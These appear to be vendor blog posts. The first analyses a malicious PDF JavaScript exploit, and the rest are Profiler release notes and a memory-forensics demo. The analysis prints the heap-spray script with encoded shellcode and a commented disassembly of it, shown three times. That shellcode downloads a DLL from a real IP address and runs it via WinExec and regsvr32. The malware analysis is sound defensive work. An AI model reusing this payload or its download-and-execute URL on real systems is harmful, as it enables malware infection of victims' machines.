var _l1 = '4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000';
var _l2 = '4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000';
_l3 = this;
_l4 = new Array();

/*function _l5()
{
    var _l6 = _l3.viewerVersion.toString();
    _l6 = _l6.replace('.', '');
    while (_l6.length < 4) _l6 += '0';
    return parseInt(_l6, 10)
}*/
function _l7(_l8, _l9)
{
    while (_l8.length * 2 < _l9) _l8 += _l8;
    return _l8.substring(0, _l9 / 2)
}
function _I0(_I1)
{
    _I1 = unescape(_I1);
    roteDak = _I1.length * 2;
    dakRote = unescape('%u9090');
    spray = _l7(dakRote, 0x2000 - roteDak);
    loxWhee = _I1 + spray;
    loxWhee = _l7(loxWhee, 0x2000);
    for (i = 0; i < 1; i++) _l4[i] = loxWhee.substr(0, loxWhee.length - 1) + dakRote;
}
function _I2(_I1, len)
{
    while (_I1.length < len) _I1 += _I1;
    return _I1.substring(0, len)
}
function _I3(_I1)
{
    ret = '';
    for (i = 0; i < _I1.length; i += 2)
    {
        b = _I1.substr(i, 2);
        c = parseInt(b, 16);
        ret += String.fromCharCode(c);
    }
    return ret
}
function _ji1(_I1, _I4)
{
    _I5 = '';
    for (_I6 = 0; _I6 < _I1.length; _I6++)
    {
        _l9 = _I4.length;
        _I7 = _I1.charCodeAt(_I6);
        _I8 = _I4.charCodeAt(_I6 % _l9);
        _I5 += String.fromCharCode(_I7 ^ _I8);
    }
    return _I5
}
function _I9(_I6)
{
    _j0 = _I6.toString(16);
    _j1 = _j0.length;
    _I5 = (_j1 % 2) ? '0' + _j0 : _j0;
    return _I5
}
function _j2(_I1)
{
    _I5 = '';
    for (_I6 = 0; _I6 < _I1.length; _I6 += 2)
    {
        _I5 += '%u';
        _I5 += _I9(_I1.charCodeAt(_I6 + 1));
        _I5 += _I9(_I1.charCodeAt(_I6))
    }
    return _I5
}
function asciiToHex(str)
{
    var arr = [];
    for (var n = 0, l = str.length; n < l; n ++) 
    {
        var ch = str.charCodeAt(n);
        var hex = Number(ch & 0xFF).toString(16);
        if (hex.length < 2) hex = "0" + hex;
        arr.push(hex);
        hex = Number(ch >>> 8).toString(16);
        while (hex.length < 2) hex = "0" + hex;
        arr.push(hex);
    }
    return arr.join('');
}
function _j3()
{
    _j4 = 9000;
    if (_j4 < 9000)
    {
        _j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
        _j6 = _l1;
        _j7 = _I3(_j6)
    }
    else
    {
        _j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
        _j6 = _l2;
        _j7 = _I3(_j6)
    }
    _j8 = 'SUkqADggAABB';
    _j9 = _I2('QUFB', 10984);
    _ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
    _ll1 = _j8 + _j9 + _ll0 + _j5;
    _ll2 = _ji1(_j7, '');
    if (_ll2.length % 2) _ll2 += unescape('%00');
    _ll3 = _j2(_ll2);
    with(
    {
        k: _ll3
    }) _I0(k);
    print(asciiToHex(_l4[0]));
}
_j3();

We can run this script in the JavaScript debugger (Ctrl+R->Debug JavaScript).

The final print will give us the payload in memory. We can copy the just the initial part, avoiding the padding. Let's paste the string into a text editor in Profiler and then Ctrl+R->Hex string to bytes.

If we look at the payload, we can see that the beginning (the marked portion) looks like ROP code. So in order to avoid looking for the gadgets in memory, let's skip the ROP as it most likely is only going to jump to the actual shellcode. Let's assume that is the case and thus focus on the data which follows.

We can see a web address at the end of the data. So we could just assume that the shellcode downloads an executable and runs it. But just for the sake of completeness, let's analyze it.

We can of course disassemble the shellcode by applying a filter to it (Ctrl+T->x86 disasm). But what we'll do is to use a debugger via Ctrl+R->Shellcode to execute. This way we can quickly step through what it does.

Here's the commented code:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
00000000 66 83 E4 FC and sp, 0xfffc
00000004 FC cld
00000005 85 E4 test esp, esp
00000007 75 34 jne 0x3d
0000000A 5F pop edi
0000000B 33 C0 xor eax, eax
0000000D 64 8B 40 30 mov eax, dword ptr fs:[eax + 0x30]
00000011 8B 40 0C mov eax, dword ptr [eax + 0xc]
00000014 8B 70 1C mov esi, dword ptr [eax + 0x1c]
00000017 56 push esi
00000018 8B 76 08 mov esi, dword ptr [esi + 8]
0000001B 33 DB xor ebx, ebx
0000001D 66 8B 5E 3C mov bx, word ptr [esi + 0x3c]
00000021 03 74 33 2C add esi, dword ptr [ebx + esi + 0x2c]
00000025 81 EE 15 10 FF FF sub esi, 0xffff1015
0000002B B8 8B 40 30 C3 mov eax, 0xc330408b
00000030 46 inc esi
00000031 39 06 cmp dword ptr [esi], eax
00000033 75 FB jne 0x30
00000035 87 34 24 xchg dword ptr [esp], esi
00000038 85 E4 test esp, esp
0000003A 75 51 jne 0x8d
0000003D EB 4C jmp 0x8b
; resolve API
0000003F 51 push ecx
00000040 56 push esi
00000041 8B 75 3C mov esi, dword ptr [ebp + 0x3c]
00000044 8B 74 35 78 mov esi, dword ptr [ebp + esi + 0x78]
00000048 03 F5 add esi, ebp
0000004A 56 push esi
0000004B 8B 76 20 mov esi, dword ptr [esi + 0x20]
0000004E 03 F5 add esi, ebp
00000050 33 C9 xor ecx, ecx
00000052 49 dec ecx
00000053 41 inc ecx
00000054 FC cld
00000055 AD lodsd eax, dword ptr [esi]
00000056 03 C5 add eax, ebp
00000058 33 DB xor ebx, ebx
0000005A 0F BE 10 movsx edx, byte ptr [eax]
0000005D 38 F2 cmp dl, dh
0000005F 74 08 je 0x69
00000061 C1 CB 0D ror ebx, 0xd
00000064 03 DA add ebx, edx
00000066 40 inc eax
00000067 EB F1 jmp 0x5a
00000069 3B 1F cmp ebx, dword ptr [edi]
0000006B 75 E6 jne 0x53
0000006D 5E pop esi
0000006E 8B 5E 24 mov ebx, dword ptr [esi + 0x24]
00000071 03 DD add ebx, ebp
00000073 66 8B 0C 4B mov cx, word ptr [ebx + ecx*2]
00000077 8D 46 EC lea eax, dword ptr [esi - 0x14]
0000007A FF 54 24 0C call dword ptr [esp + 0xc]
0000007E 8B D8 mov ebx, eax
00000080 03 DD add ebx, ebp
00000082 8B 04 8B mov eax, dword ptr [ebx + ecx*4]
00000085 03 C5 add eax, ebp
00000087 AB stosd dword ptr es:[edi], eax
00000088 5E pop esi
00000089 59 pop ecx
0000008A C3 ret
0000008B EB 53 jmp 0xe0
0000008D AD lodsd eax, dword ptr [esi]
0000008E 8B 68 20 mov ebp, dword ptr [eax + 0x20]
00000091 80 7D 0C 33 cmp byte ptr [ebp + 0xc], 0x33
00000095 74 03 je 0x9a
00000097 96 xchg eax, esi
00000098 EB F3 jmp 0x8d
0000009A 8B 68 08 mov ebp, dword ptr [eax + 8]
0000009D 8B F7 mov esi, edi
0000009F 6A 05 push 5
000000A1 59 pop ecx
000000A2 E8 98 FF FF FF call 0x3f ; resolve API
000000A7 E2 F9 loop 0xa2 ; loops resolving the following APIs:
; LoadLibraryA
; WinExec
; TerminateThread
; GetTempPathA
; VirtualProtect
000000A9 E8 00 00 00 00 call 0xae
000000AE 58 pop eax
000000AF 50 push eax
000000B0 6A 40 push 0x40
000000B2 68 FF 00 00 00 push 0xff
000000B7 50 push eax
000000B8 83 C0 19 add eax, 0x19
000000BB 50 push eax
000000BC 55 push ebp
000000BD 8B EC mov ebp, esp
000000BF 8B 5E 10 mov ebx, dword ptr [esi + 0x10]
000000C2 83 C3 05 add ebx, 5
000000C5 FF E3 jmp ebx ; calls VirtualProtect with stolen bytes
000000C7 68 6F 6E 00 00 push 0x6e6f
000000CC 68 75 72 6C 6D push 0x6d6c7275 ; pushes URLMON string to stack
000000D1 54 push esp
000000D2 FF 16 call dword ptr [esi] ; calls a gadget which calls LoadLibraryA and returns the URLMON base address
000000D4 83 C4 08 add esp, 8
000000D7 8B E8 mov ebp, eax
000000D9 E8 61 FF FF FF call 0x3f ; resolves URLDownloadToFileA
000000DE EB 02 jmp 0xe2
000000E0 EB 72 jmp 0x154
000000E2 81 EC 04 01 00 00 sub esp, 0x104
000000E8 8D 5C 24 0C lea ebx, dword ptr [esp + 0xc]
000000EC C7 04 24 72 65 67+ mov dword ptr [esp], 0x73676572
000000F3 C7 44 24 04 76 72+ mov dword ptr [esp + 4], 0x32337276
000000FB C7 44 24 08 20 2D+ mov dword ptr [esp + 8], 0x20732d20 ; pushes "regsvr32 -s " to the stack
00000103 53 push ebx
00000104 68 F8 00 00 00 push 0xf8
00000109 FF 56 0C call dword ptr [esi + 0xc] ; call GetTempFilePathA
0000010C 8B E8 mov ebp, eax
0000010E 33 C9 xor ecx, ecx
00000110 51 push ecx
00000111 C7 44 1D 00 77 70+ mov dword ptr [ebp + ebx], 0x74627077
00000119 C7 44 1D 05 2E 64+ mov dword ptr [ebp + ebx + 5], 0x6c6c642e
00000121 C6 44 1D 09 00 mov byte ptr [ebp + ebx + 9], 0 ; appends "wpbt0.dll" to the path
00000126 59 pop ecx
00000127 8A C1 mov al, cl
00000129 04 30 add al, 0x30
0000012B 88 44 1D 04 mov byte ptr [ebp + ebx + 4], al
0000012F 41 inc ecx
00000130 51 push ecx
00000131 6A 00 push 0
00000133 6A 00 push 0
00000135 53 push ebx
00000136 57 push edi
00000137 6A 00 push 0
00000139 FF 56 14 call dword ptr [esi + 0x14] ; calls URLDownloadToFileA with the created path with the URL: http://129.121.231.188/data/Home/w.php?f=16&e=4
0000013C 85 C0 test eax, eax
0000013E 75 16 jne 0x156
00000140 6A 00 push 0
00000142 53 push ebx
00000143 FF 56 04 call dword ptr [esi + 4] ; calls WinExec on the downloaded file
00000146 6A 00 push 0
00000148 83 EB 0C sub ebx, 0xc
0000014B 53 push ebx
0000014C FF 56 04 call dword ptr [esi + 4] ; calls WinExec on "regsvr32 -s " followed by the downloaded file
0000014F 83 C3 0C add ebx, 0xc
00000152 EB 02 jmp 0x156
00000154 EB 13 jmp 0x169
00000156 47 inc edi
00000157 80 3F 00 cmp byte ptr [edi], 0
0000015A 75 FA jne 0x156
0000015C 47 inc edi
0000015D 80 3F 00 cmp byte ptr [edi], 0
00000160 75 C4 jne 0x126
00000162 6A 00 push 0
00000164 6A FE push -2
00000166 FF 56 08 call dword ptr [esi + 8] ; calls TerminateThread
00000169 E8 9C FE FF FF call 0xa
00000000 66 83 E4 FC and sp, 0xfffc 00000004 FC cld 00000005 85 E4 test esp, esp 00000007 75 34 jne 0x3d 0000000A 5F pop edi 0000000B 33 C0 xor eax, eax 0000000D 64 8B 40 30 mov eax, dword ptr fs:[eax + 0x30] 00000011 8B 40 0C mov eax, dword ptr [eax + 0xc] 00000014 8B 70 1C mov esi, dword ptr [eax + 0x1c] 00000017 56 push esi 00000018 8B 76 08 mov esi, dword ptr [esi + 8] 0000001B 33 DB xor ebx, ebx 0000001D 66 8B 5E 3C mov bx, word ptr [esi + 0x3c] 00000021 03 74 33 2C add esi, dword ptr [ebx + esi + 0x2c] 00000025 81 EE 15 10 FF FF sub esi, 0xffff1015 0000002B B8 8B 40 30 C3 mov eax, 0xc330408b 00000030 46 inc esi 00000031 39 06 cmp dword ptr [esi], eax 00000033 75 FB jne 0x30 00000035 87 34 24 xchg dword ptr [esp], esi 00000038 85 E4 test esp, esp 0000003A 75 51 jne 0x8d 0000003D EB 4C jmp 0x8b ; resolve API 0000003F 51 push ecx 00000040 56 push esi 00000041 8B 75 3C mov esi, dword ptr [ebp + 0x3c] 00000044 8B 74 35 78 mov esi, dword ptr [ebp + esi + 0x78] 00000048 03 F5 add esi, ebp 0000004A 56 push esi 0000004B 8B 76 20 mov esi, dword ptr [esi + 0x20] 0000004E 03 F5 add esi, ebp 00000050 33 C9 xor ecx, ecx 00000052 49 dec ecx 00000053 41 inc ecx 00000054 FC cld 00000055 AD lodsd eax, dword ptr [esi] 00000056 03 C5 add eax, ebp 00000058 33 DB xor ebx, ebx 0000005A 0F BE 10 movsx edx, byte ptr [eax] 0000005D 38 F2 cmp dl, dh 0000005F 74 08 je 0x69 00000061 C1 CB 0D ror ebx, 0xd 00000064 03 DA add ebx, edx 00000066 40 inc eax 00000067 EB F1 jmp 0x5a 00000069 3B 1F cmp ebx, dword ptr [edi] 0000006B 75 E6 jne 0x53 0000006D 5E pop esi 0000006E 8B 5E 24 mov ebx, dword ptr [esi + 0x24] 00000071 03 DD add ebx, ebp 00000073 66 8B 0C 4B mov cx, word ptr [ebx + ecx*2] 00000077 8D 46 EC lea eax, dword ptr [esi - 0x14] 0000007A FF 54 24 0C call dword ptr [esp + 0xc] 0000007E 8B D8 mov ebx, eax 00000080 03 DD add ebx, ebp 00000082 8B 04 8B mov eax, dword ptr [ebx + ecx*4] 00000085 03 C5 add eax, ebp 00000087 AB stosd dword ptr es:[edi], eax 00000088 5E pop esi 00000089 59 pop ecx 0000008A C3 ret 0000008B EB 53 jmp 0xe0 0000008D AD lodsd eax, dword ptr [esi] 0000008E 8B 68 20 mov ebp, dword ptr [eax + 0x20] 00000091 80 7D 0C 33 cmp byte ptr [ebp + 0xc], 0x33 00000095 74 03 je 0x9a 00000097 96 xchg eax, esi 00000098 EB F3 jmp 0x8d 0000009A 8B 68 08 mov ebp, dword ptr [eax + 8] 0000009D 8B F7 mov esi, edi 0000009F 6A 05 push 5 000000A1 59 pop ecx 000000A2 E8 98 FF FF FF call 0x3f ; resolve API 000000A7 E2 F9 loop 0xa2 ; loops resolving the following APIs: ; LoadLibraryA ; WinExec ; TerminateThread ; GetTempPathA ; VirtualProtect 000000A9 E8 00 00 00 00 call 0xae 000000AE 58 pop eax 000000AF 50 push eax 000000B0 6A 40 push 0x40 000000B2 68 FF 00 00 00 push 0xff 000000B7 50 push eax 000000B8 83 C0 19 add eax, 0x19 000000BB 50 push eax 000000BC 55 push ebp 000000BD 8B EC mov ebp, esp 000000BF 8B 5E 10 mov ebx, dword ptr [esi + 0x10] 000000C2 83 C3 05 add ebx, 5 000000C5 FF E3 jmp ebx ; calls VirtualProtect with stolen bytes 000000C7 68 6F 6E 00 00 push 0x6e6f 000000CC 68 75 72 6C 6D push 0x6d6c7275 ; pushes URLMON string to stack 000000D1 54 push esp 000000D2 FF 16 call dword ptr [esi] ; calls a gadget which calls LoadLibraryA and returns the URLMON base address 000000D4 83 C4 08 add esp, 8 000000D7 8B E8 mov ebp, eax 000000D9 E8 61 FF FF FF call 0x3f ; resolves URLDownloadToFileA 000000DE EB 02 jmp 0xe2 000000E0 EB 72 jmp 0x154 000000E2 81 EC 04 01 00 00 sub esp, 0x104 000000E8 8D 5C 24 0C lea ebx, dword ptr [esp + 0xc] 000000EC C7 04 24 72 65 67+ mov dword ptr [esp], 0x73676572 000000F3 C7 44 24 04 76 72+ mov dword ptr [esp + 4], 0x32337276 000000FB C7 44 24 08 20 2D+ mov dword ptr [esp + 8], 0x20732d20 ; pushes "regsvr32 -s " to the stack 00000103 53 push ebx 00000104 68 F8 00 00 00 push 0xf8 00000109 FF 56 0C call dword ptr [esi + 0xc] ; call GetTempFilePathA 0000010C 8B E8 mov ebp, eax 0000010E 33 C9 xor ecx, ecx 00000110 51 push ecx 00000111 C7 44 1D 00 77 70+ mov dword ptr [ebp + ebx], 0x74627077 00000119 C7 44 1D 05 2E 64+ mov dword ptr [ebp + ebx + 5], 0x6c6c642e 00000121 C6 44 1D 09 00 mov byte ptr [ebp + ebx + 9], 0 ; appends "wpbt0.dll" to the path 00000126 59 pop ecx 00000127 8A C1 mov al, cl 00000129 04 30 add al, 0x30 0000012B 88 44 1D 04 mov byte ptr [ebp + ebx + 4], al 0000012F 41 inc ecx 00000130 51 push ecx 00000131 6A 00 push 0 00000133 6A 00 push 0 00000135 53 push ebx 00000136 57 push edi 00000137 6A 00 push 0 00000139 FF 56 14 call dword ptr [esi + 0x14] ; calls URLDownloadToFileA with the created path with the URL: http://129.121.231.188/data/Home/w.php?f=16&e=4 0000013C 85 C0 test eax, eax 0000013E 75 16 jne 0x156 00000140 6A 00 push 0 00000142 53 push ebx 00000143 FF 56 04 call dword ptr [esi + 4] ; calls WinExec on the downloaded file 00000146 6A 00 push 0 00000148 83 EB 0C sub ebx, 0xc 0000014B 53 push ebx 0000014C FF 56 04 call dword ptr [esi + 4] ; calls WinExec on "regsvr32 -s " followed by the downloaded file 0000014F 83 C3 0C add ebx, 0xc 00000152 EB 02 jmp 0x156 00000154 EB 13 jmp 0x169 00000156 47 inc edi 00000157 80 3F 00 cmp byte ptr [edi], 0 0000015A 75 FA jne 0x156 0000015C 47 inc edi 0000015D 80 3F 00 cmp byte ptr [edi], 0 00000160 75 C4 jne 0x126 00000162 6A 00 push 0 00000164 6A FE push -2 00000166 FF 56 08 call dword ptr [esi + 8] ; calls TerminateThread 00000169 E8 9C FE FF FF call 0xa
00000000 66 83 E4 FC        and       sp, 0xfffc
00000004 FC                 cld       
00000005 85 E4              test      esp, esp
00000007 75 34              jne       0x3d

0000000A 5F                 pop       edi
0000000B 33 C0              xor       eax, eax
0000000D 64 8B 40 30        mov       eax, dword ptr fs:[eax + 0x30]
00000011 8B 40 0C           mov       eax, dword ptr [eax + 0xc]
00000014 8B 70 1C           mov       esi, dword ptr [eax + 0x1c]
00000017 56                 push      esi
00000018 8B 76 08           mov       esi, dword ptr [esi + 8]
0000001B 33 DB              xor       ebx, ebx
0000001D 66 8B 5E 3C        mov       bx, word ptr [esi + 0x3c]
00000021 03 74 33 2C        add       esi, dword ptr [ebx + esi + 0x2c]
00000025 81 EE 15 10 FF FF  sub       esi, 0xffff1015
0000002B B8 8B 40 30 C3     mov       eax, 0xc330408b
00000030 46                 inc       esi
00000031 39 06              cmp       dword ptr [esi], eax
00000033 75 FB              jne       0x30
00000035 87 34 24           xchg      dword ptr [esp], esi
00000038 85 E4              test      esp, esp
0000003A 75 51              jne       0x8d

0000003D EB 4C              jmp       0x8b

; resolve API
0000003F 51                 push      ecx
00000040 56                 push      esi
00000041 8B 75 3C           mov       esi, dword ptr [ebp + 0x3c]
00000044 8B 74 35 78        mov       esi, dword ptr [ebp + esi + 0x78]
00000048 03 F5              add       esi, ebp
0000004A 56                 push      esi
0000004B 8B 76 20           mov       esi, dword ptr [esi + 0x20]
0000004E 03 F5              add       esi, ebp
00000050 33 C9              xor       ecx, ecx
00000052 49                 dec       ecx
00000053 41                 inc       ecx
00000054 FC                 cld       
00000055 AD                 lodsd     eax, dword ptr [esi]
00000056 03 C5              add       eax, ebp
00000058 33 DB              xor       ebx, ebx
0000005A 0F BE 10           movsx     edx, byte ptr [eax]
0000005D 38 F2              cmp       dl, dh
0000005F 74 08              je        0x69
00000061 C1 CB 0D           ror       ebx, 0xd
00000064 03 DA              add       ebx, edx
00000066 40                 inc       eax
00000067 EB F1              jmp       0x5a
00000069 3B 1F              cmp       ebx, dword ptr [edi]
0000006B 75 E6              jne       0x53
0000006D 5E                 pop       esi
0000006E 8B 5E 24           mov       ebx, dword ptr [esi + 0x24]
00000071 03 DD              add       ebx, ebp
00000073 66 8B 0C 4B        mov       cx, word ptr [ebx + ecx*2]
00000077 8D 46 EC           lea       eax, dword ptr [esi - 0x14]
0000007A FF 54 24 0C        call      dword ptr [esp + 0xc]
0000007E 8B D8              mov       ebx, eax
00000080 03 DD              add       ebx, ebp
00000082 8B 04 8B           mov       eax, dword ptr [ebx + ecx*4]
00000085 03 C5              add       eax, ebp
00000087 AB                 stosd     dword ptr es:[edi], eax
00000088 5E                 pop       esi
00000089 59                 pop       ecx
0000008A C3                 ret       

0000008B EB 53              jmp       0xe0

0000008D AD                 lodsd     eax, dword ptr [esi]
0000008E 8B 68 20           mov       ebp, dword ptr [eax + 0x20]
00000091 80 7D 0C 33        cmp       byte ptr [ebp + 0xc], 0x33
00000095 74 03              je        0x9a
00000097 96                 xchg      eax, esi
00000098 EB F3              jmp       0x8d
0000009A 8B 68 08           mov       ebp, dword ptr [eax + 8]
0000009D 8B F7              mov       esi, edi
0000009F 6A 05              push      5
000000A1 59                 pop       ecx
000000A2 E8 98 FF FF FF     call      0x3f ; resolve API
000000A7 E2 F9              loop      0xa2 ; loops resolving the following APIs:
                                            ; LoadLibraryA
                                            ; WinExec
                                            ; TerminateThread
                                            ; GetTempPathA
                                            ; VirtualProtect
000000A9 E8 00 00 00 00     call      0xae
000000AE 58                 pop       eax
000000AF 50                 push      eax
000000B0 6A 40              push      0x40
000000B2 68 FF 00 00 00     push      0xff
000000B7 50                 push      eax
000000B8 83 C0 19           add       eax, 0x19
000000BB 50                 push      eax
000000BC 55                 push      ebp
000000BD 8B EC              mov       ebp, esp
000000BF 8B 5E 10           mov       ebx, dword ptr [esi + 0x10]
000000C2 83 C3 05           add       ebx, 5
000000C5 FF E3              jmp       ebx  ; calls VirtualProtect with stolen bytes
000000C7 68 6F 6E 00 00     push      0x6e6f
000000CC 68 75 72 6C 6D     push      0x6d6c7275 ; pushes URLMON string to stack
000000D1 54                 push      esp
000000D2 FF 16              call      dword ptr [esi] ; calls a gadget which calls LoadLibraryA and returns the URLMON base address
000000D4 83 C4 08           add       esp, 8
000000D7 8B E8              mov       ebp, eax
000000D9 E8 61 FF FF FF     call      0x3f ; resolves URLDownloadToFileA
000000DE EB 02              jmp       0xe2

000000E0 EB 72              jmp       0x154

000000E2 81 EC 04 01 00 00  sub       esp, 0x104
000000E8 8D 5C 24 0C        lea       ebx, dword ptr [esp + 0xc]
000000EC C7 04 24 72 65 67+ mov       dword ptr [esp], 0x73676572
000000F3 C7 44 24 04 76 72+ mov       dword ptr [esp + 4], 0x32337276
000000FB C7 44 24 08 20 2D+ mov       dword ptr [esp + 8], 0x20732d20 ; pushes "regsvr32 -s " to the stack
00000103 53                 push      ebx
00000104 68 F8 00 00 00     push      0xf8
00000109 FF 56 0C           call      dword ptr [esi + 0xc] ; call GetTempFilePathA
0000010C 8B E8              mov       ebp, eax
0000010E 33 C9              xor       ecx, ecx
00000110 51                 push      ecx
00000111 C7 44 1D 00 77 70+ mov       dword ptr [ebp + ebx], 0x74627077
00000119 C7 44 1D 05 2E 64+ mov       dword ptr [ebp + ebx + 5], 0x6c6c642e
00000121 C6 44 1D 09 00     mov       byte ptr [ebp + ebx + 9], 0 ; appends "wpbt0.dll" to the path
00000126 59                 pop       ecx
00000127 8A C1              mov       al, cl
00000129 04 30              add       al, 0x30
0000012B 88 44 1D 04        mov       byte ptr [ebp + ebx + 4], al
0000012F 41                 inc       ecx
00000130 51                 push      ecx
00000131 6A 00              push      0
00000133 6A 00              push      0
00000135 53                 push      ebx
00000136 57                 push      edi
00000137 6A 00              push      0
00000139 FF 56 14           call      dword ptr [esi + 0x14] ; calls URLDownloadToFileA with the created path with the URL: http://129.121.231.188/data/Home/w.php?f=16&e=4
0000013C 85 C0              test      eax, eax
0000013E 75 16              jne       0x156
00000140 6A 00              push      0
00000142 53                 push      ebx
00000143 FF 56 04           call      dword ptr [esi + 4] ; calls WinExec on the downloaded file
00000146 6A 00              push      0
00000148 83 EB 0C           sub       ebx, 0xc
0000014B 53                 push      ebx
0000014C FF 56 04           call      dword ptr [esi + 4] ; calls WinExec on "regsvr32 -s " followed by the downloaded file
0000014F 83 C3 0C           add       ebx, 0xc
00000152 EB 02              jmp       0x156

00000154 EB 13              jmp       0x169

00000156 47                 inc       edi
00000157 80 3F 00           cmp       byte ptr [edi], 0
0000015A 75 FA              jne       0x156
0000015C 47                 inc       edi
0000015D 80 3F 00           cmp       byte ptr [edi], 0
00000160 75 C4              jne       0x126
00000162 6A 00              push      0
00000164 6A FE              push      -2
00000166 FF 56 08           call      dword ptr [esi + 8] ; calls TerminateThread

00000169 E8 9C FE FF FF     call      0xa

So yes, in the end it just downloads the file from the address we've seen and tries to execute it, then tries to register it as a COM object. Some AV-evasion techniques are also present.

Cheers!

Profiler 2.6

Profiler 2.6 is out with the following news:

– added initial support for XML files
– added support for XDP files (extraction of embedded PDFs)
– exposed the ABC format
– improved the parsing of malformed PDF streams
– fixed the code signing on OS X to meet El Capitan requirements
– fixed the JS debugger on Linux
– various bug fixes and improvements

Enjoy!

Windows Memory Forensics

Let’s begin with an image:

Yep. That’s an icon. In an executable. In a process address space. In a raw memory dump.

And here is the video demonstration:

This is just a proof-of-concept. We still haven’t decided whether to develop this further. It really depends on whether the forensic community is interested in having such a product. So, even a re-tweet will have an impact on our decision. 🙂 We wanted to show what is currently possible and, of course, it’s not the end of the cool things which are possible.

In case we decide to go ahead with the development, we will probably create a beta-test group of potential customers and decide with them a roadmap for a 1.0 version, taking into consideration all those features which are essential to them. What we already support are the Windows versions that go from XP to 10 on the following architectures: x86, x86-PAE, x64. And, of course, the software itself, just like Profiler, runs on Windows, OS X and Linux.

And now to the more technical side if you’re interested. What we have shown in this demonstration is just a Python extension for Profiler. To be more specific, it’s only about 1000 lines of Python code and this includes all the UI views. The bulk of the work went into exposing all the necessary capabilities of our SDK to Python. Of course, all this work also benefits other extensions, not just the memory forensics ones. So, if this project ends with this post, it’s really not a tragedy, as we haven’t lost any significant time developing specific stuff for it.

So why did we choose to write our memory forensics support in Python, rather than in C++, which would’ve taken us a lot less time? The reasons are several. The memory forensic field is always changing rapidly and setting code in stone by compiling it wouldn’t be a good idea. Also, we wanted to give our customers the possibility to inspect the code and to modify it. Just by looking at existing code it’s extremely easy to write new utilities. While on the other hand, having our core engine and UI written in C++, makes our tool very fast. We think this is the perfect combination.

If you’re wondering why we didn’t use Volatility as a backbone, the answer is that it would’ve been incompatible on a licensing level and way too difficult to fit nicely into our existing framework to accomplish what we wanted to do.

We hope you enjoyed the demo and we would be happy to receive your feedback!

Profiler 2.5

Profiler 2.5 is out with the following news:

introduced scan provider extensions
added support for Torrent files
added the capability to display views as dialogs
exposed official Python bindings for capstone
– added new controls to custom views
– updated capstone to 3.0.3
fixed failed allocation security issue
– various bug fixes and improvements

Dialogs from views

In this new edition it’s possible to create dialogs out of views. Just like this:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
ctx = proContext()
view = ctx.createView(ProView.Type_Custom, "Dialog title")
view.setup(view_layout, viewCallback, user_data)
dlg = ctx.createDialog(view)
dlg.show()
ctx = proContext() view = ctx.createView(ProView.Type_Custom, "Dialog title") view.setup(view_layout, viewCallback, user_data) dlg = ctx.createDialog(view) dlg.show()
ctx = proContext()
view = ctx.createView(ProView.Type_Custom, "Dialog title")
view.setup(view_layout, viewCallback, user_data)
dlg = ctx.createDialog(view)
dlg.show()

Of course, it doesn’t have to be a custom view, it can even be a simple text view or a hex view, although usually custom views make more sense for a dialog, as you’ll probably want to show some standard buttons like “Ok” and “Cancel” at the bottom.

Capstone bindings

While Capstone has been part of Profiler for quite some time now, now it’s possible to directly call its official Python bindings. The module can be found under ‘Pro.capstone’ and can be imported easily to be made working with existing code:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
import Pro.capstone as capstone
import Pro.capstone as capstone
import Pro.capstone as capstone

Failed allocation security issue

In the Qt framework memory allocations fail silently, at least in the release version. We didn’t notice it, because in the debug version they would at least throw an exception preventing further execution. Since in release the execution wouldn’t be stopped, it was in some cases possible to trigger a failed allocation and then make the program use memory it didn’t own (so basically a buffer overflow). This problem has now been fixed.

Credit goes to the Insid3Code Team for having found and reported the issue.

Enjoy!

Torrent Support

